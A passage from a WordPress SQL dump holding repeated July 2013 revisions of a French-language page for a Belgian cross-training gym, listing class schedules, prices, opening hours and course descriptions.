carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:49:28', '2013-07-03 17:49:28', '', 11, 'http://www.crosstrainingcenter.be/?p=199', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(200, 1, '2013-07-03 17:51:17', '2013-07-03 17:51:17', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 45%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:51:17', '2013-07-03 17:51:17', '', 11, 'http://www.crosstrainingcenter.be/?p=200', 0, 'revision', '', 0),
(201, 1, '2013-07-03 17:51:52', '2013-07-03 17:51:52', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br><br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 98%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:51:52', '2013-07-03 17:51:52', '', 11, 'http://www.crosstrainingcenter.be/?p=201', 0, 'revision', '', 0),
(202, 1, '2013-07-03 17:53:40', '2013-07-03 17:53:40', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 98%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 